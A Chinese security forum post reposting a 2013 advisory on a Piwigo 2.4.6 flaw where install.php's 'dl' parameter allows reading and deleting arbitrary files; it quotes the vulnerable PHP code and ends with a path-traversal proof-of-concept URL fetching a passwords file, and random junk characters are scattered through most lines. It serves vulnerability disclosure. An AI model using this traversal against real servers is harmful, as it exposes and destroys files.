找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2392|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
1 Z- g( k4 Y4 w8 Z* i2 }1 o( Y9 ^7 d$ M9 ~% z4 v
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。4 H, a# g5 c* r# D# }
====================================================================' a- e% E2 O5 p6 X5 L% i
/install.php:
$ G+ U1 Z: Q5 g, w& l( h5 K& k3 {-------------7 G. X$ S8 _( m  ?( X
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
1 r9 e* Q$ V! C% e7 f- f# w114: {7 o/ R9 \1 G) Z6 X) |& ], a
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];4 m  X) d6 }7 @2 t1 g; v
116:   header('Cache-Control: no-cache, must-revalidate');- Z. d+ g! ?/ S7 \$ T+ l4 V
117:   header('Pragma: no-cache');
' P1 [( p, r% I+ f118:   header('Content-Disposition: attachment; filename="database.inc.php"');- ^$ S' R4 |2 `# R6 ~; D
119:   header('Content-Transfer-Encoding: binary');) z7 i" T% I# f5 R* W
120:   header('Content-Length: '.filesize($filename));
) D, ~' u" q4 K) D4 A121:   echo file_get_contents($filename);
6 a* n2 E& e3 [+ c' u$ X122:   unlink($filename);
3 N& a5 Y$ A) \123:   exit();, ^! L4 P  |6 ~) o
124: }
9 [) w+ v: x$ Q# k" V7 i====================================================================) H- B! C& Q- q& ?) A

+ Y5 h- O. o( N4 A+ y) QTested on: Microsoft Windows 7 Ultimate SP1 (EN)* m$ ~$ i: ~" v$ ]  C. f1 E
           Apache 2.4.2 (Win32)  T# m" t: |- y) I" g
           PHP 5.4.4$ Q# t8 C4 ?& ^! U5 U" i! ?
           MySQL 5.5.25a) b0 }. X, Q' D

7 _2 \/ m  d9 ^, I# f0 M" |9 mVulnerability discovered by Gjoko 'LiquidWorm' Krstic4 Z& S4 h* x8 Y9 \3 u! I
                            @zeroscience7 |+ Q. }& j. m6 q6 D

/ z3 i2 u9 d: M: @. CAdvisory ID: ZSL-2013-5127- X( @1 V" X6 Q( v1 P, n6 b
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php. x3 k$ i  m) N, O% I" j# `
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
6 T8 B0 L* R& ^  _$ z ; R1 W# F! d7 z7 W5 r  X" W. X
15.02.2013
# s7 x4 E. h$ Z5 y1 b, j# j9 d7 T
* q+ I5 X8 E! {4 l--
  p: T1 X& d) R- Shttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt+ [  S4 `7 @' v7 F; J
* Y. ~9 L, ?8 {) R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表